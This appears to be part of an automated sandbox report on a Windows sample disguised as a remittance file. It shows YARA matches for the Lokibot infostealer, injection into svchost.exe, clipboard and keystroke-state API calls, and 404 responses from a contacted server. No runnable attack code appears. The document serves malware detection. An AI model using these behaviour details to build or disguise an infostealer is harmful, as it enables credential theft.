            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:18:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3ZWxdKorDFSB5IZXVYX2MewDmekweZ8d11xa7BBzxkLsHKGWjESVxx6Sxp6HGm1NTMxbBuHHJMetHnXRcwEGWelFW0jsM5QkhPoz6B95zGhURSrURMR5rarTvcs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f77aaac8cf5f6-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1548&min_rtt=1548&rtt_var=774&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:18:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=64ZJnZESU7Hcemvg5mNGMP4cqdtfuX2ZQDVtVo9qWojTCVdkMff6aHlse6Xh7o0OdHtgsskX%2BCuVjoOm%2Bf%2BQ876tcnc6vgxmknPk2YsaTTP2kA%2F6WIONTBxbE6I%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f77b09f4d42ac-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1618&min_rtt=1618&rtt_var=809&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:18:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uf2OoTRUYUtrjHSM%2BuraRNmsqrHc0D2ceUhJ1kCCoPh9nd3eBYGttj5ncfXdM6uof6U0uhMTU3TYE1Qt3SJA9mUwYYtHTb%2FA0imlgJfTk3sftNuAzwHKoS9GD9A%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f77b6789841a1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1827&min_rtt=1827&rtt_var=913&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:18:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aN5GR9wEDFUKqqMcHHdzVyfDVitFXCNpBWoq1xHxXKqH424M8wK3i7O3tjBRbPAYwDgLCI9gFlMqv6wIbl2sy7mNBFivRgXVf6BvUAUw3ol4Om2%2BJyZkLjqIWBg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f77bba9d10f3b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1532&min_rtt=1532&rtt_var=766&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:18:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pZ5%2B0n7OCr1u42ipwfbtqQe920VjCb2DknITJrbJp9wHiEqMrizXBVsJ4zrvVcuFvgUEIuD%2FjWN4zkF6A4MviAnaILCW3lcogSXnd09PHCrVDi0e2%2FyCL8kAOiY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f77c13be87cb1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1821&min_rtt=1821&rtt_var=910&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:18:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gPCkx7QA2Ju3YqyIbzJsZQUsnoGXtJNxbSW93bzv5YI1wpO3rmXk480oeCsoenKIOzzuNDeZrBNpTe%2BqnwAuvZN%2FlxnhMzCqmyCT6lUHHu51ZHFzd84Pqlv4kPU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f77c75cda15c7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1468&min_rtt=1468&rtt_var=734&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:18:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=duvcPbyO43yLEkaV8%2Bzj5o%2FR60t97sgFiv2MIc%2FpHc7iepyZ8%2FGn8un8%2FntSyfkNtxvrRqWLyvBt6OfkbHIrEi4NLV2wfe1XxohJXwxu2lSdiX6BcnJxR6VqAnc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f77d7c837efa3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2026&min_rtt=2026&rtt_var=1013&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:18:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rn6RvUJQVCv7wj3lhDXbFF5P0dfR8Fr0AOn4gbb8HqBYqQTPg3FyGcIWUJ%2F3YKW8HnNArkaXnlSsfCPwDuecD6M0EjtuCELSVVe%2FYingGyGf%2FKB5Q2sV2XmvwVw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f77dccb8843cf-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1558&rtt_var=779&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=158&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 15:18:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RePc5bjsmVEzNjWL7%2B%2FZNOcOfeGuLT%2BFQvoV558g56%2Fzq6nEnIljus1l%2BaKX1Hp23sgXqKExCYGExXcqOXsQ%2FyGA3My9yqQ%2BDjO2FFi%2FPF1yFTst9iX6qpFeUiA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914f77e2dd2142d3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2516&min_rtt=2516&rtt_var=1258&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=391&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: svchost.exe, svchost.exe, 00000002.00000002.3286162989.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007A4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_007A4164
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007A4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_007A4164
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007A3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_007A3F66
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0079001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0079001C
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007BCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_007BCABC

            System Summary

            barindex
            Source: 0.2.Remittance_CT022024.exe.d40000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 0.2.Remittance_CT022024.exe.d40000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 0.2.Remittance_CT022024.exe.d40000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 0.2.Remittance_CT022024.exe.d40000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 0.2.Remittance_CT022024.exe.d40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 0.2.Remittance_CT022024.exe.d40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 0.2.Remittance_CT022024.exe.d40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 0.2.Remittance_CT022024.exe.d40000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.Remittance_CT022024.exe.d40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 00000000.00000002.2070986946.0000000000D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000000.00000002.2070986946.0000000000D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000000.00000002.2070986946.0000000000D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
            Source: 00000000.00000002.2070986946.0000000000D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.2070986946.0000000000D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 00000002.00000002.3286162989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000002.00000002.3286162989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000002.00000002.3286162989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
            Source: 00000002.00000002.3286162989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.3286162989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: Process Memory Space: Remittance_CT022024.exe PID: 5780, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: Process Memory Space: svchost.exe PID: 1440, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: This is a third-party compiled AutoIt script.0_2_00733B3A
            Source: Remittance_CT022024.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Remittance_CT022024.exe, 00000000.00000000.2040808013.00000000007E4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5bac79c8-6
            Source: Remittance_CT022024.exe, 00000000.00000000.2040808013.00000000007E4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_11c65e1c-9
            Source: Remittance_CT022024.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ad435bec-c
            Source: Remittance_CT022024.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_661def22-5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B13540 RtlImageNtHeader,RpcMgmtSetServerStackSize,I_RpcServerDisableExceptionFilter,RtlSetProcessIsCritical,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProtectedPolicy,HeapSetInformation,NtSetInformationProcess,2_2_00B13540
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B133C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,2_2_00B133C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B12720 RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegCloseKey,HeapAlloc,RegQueryValueExW,ExpandEnvironmentStringsW,LCMapStringW,RegQueryValueExW,HeapFree,AcquireSRWLockShared,ReleaseSRWLockShared,HeapAlloc,memcpy,memcpy,AcquireSRWLockExclusive,ReleaseSRWLockExclusive,RegGetValueW,ActivateActCtx,LoadLibraryExW,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,RegCloseKey,HeapAlloc,RegGetValueW,WideCharToMultiByte,HeapAlloc,WideCharToMultiByte,HeapFree,ExpandEnvironmentStringsW,HeapFree,CreateActCtxW,GetLastError,HeapFree,HeapFree,GetLastError,CreateActCtxW,GetLastError,ReleaseActCtx,GetLastError,GetLastError,RtlNtStatusToDosError,GetLastError,LoadLibraryExW,RtlNtStatusToDosError,LoadLibraryExW,RtlNtStatusToDosError,HeapFree,ReleaseActCtx,2_2_00B12720
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0079A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0079A1EF
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00788310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00788310
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007951BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_007951BD
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0073E6A00_2_0073E6A0
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0075D9750_2_0075D975
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007521C50_2_007521C5
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007662D20_2_007662D2
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007B03DA0_2_007B03DA
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0076242E0_2_0076242E
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007525FA0_2_007525FA
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0078E6160_2_0078E616
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007466E10_2_007466E1
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0076878F0_2_0076878F
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007B08570_2_007B0857
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007668440_2_00766844
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007488080_2_00748808
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007988890_2_00798889
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0075CB210_2_0075CB21
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00766DB60_2_00766DB6
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00746F9E0_2_00746F9E
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007430300_2_00743030
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0075F1D90_2_0075F1D9
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007531870_2_00753187
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007312870_2_00731287
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007514840_2_00751484
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007455200_2_00745520
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007576960_2_00757696
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007457600_2_00745760
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007519780_2_00751978
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00769AB50_2_00769AB5
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0073FCE00_2_0073FCE0
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_007B7DDB0_2_007B7DDB
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0075BDA60_2_0075BDA6
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00751D900_2_00751D90
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_0073DF000_2_0073DF00
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00743FE00_2_00743FE0
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: 0_2_00D336200_2_00D33620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040549C2_2_0040549C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004029D42_2_004029D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00B127202_2_00B12720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0041219C appears 45 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00405B6F appears 42 times
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: String function: 00750AE3 appears 70 times
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: String function: 00737DE1 appears 36 times
            Source: C:\Users\user\Desktop\Remittance_CT022024.exeCode function: String function: 00758900 appears 42 times
            Source: Remittance_CT022024.exe, 00000000.00000003.2055835797.00000000037C3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Remittance_CT022024.exe
            Source: Remittance_CT022024.exe, 00000000.00000003.2053538772.00000000038BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Remittance_CT022024.exe
            Source: Remittance_CT022024.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 0.2.Remittance_CT022024.exe.d40000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 0.2.Remittance_CT022024.exe.d40000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 0.2.Remittance_CT022024.exe.d40000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.Remittance_CT022024.exe.d40000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
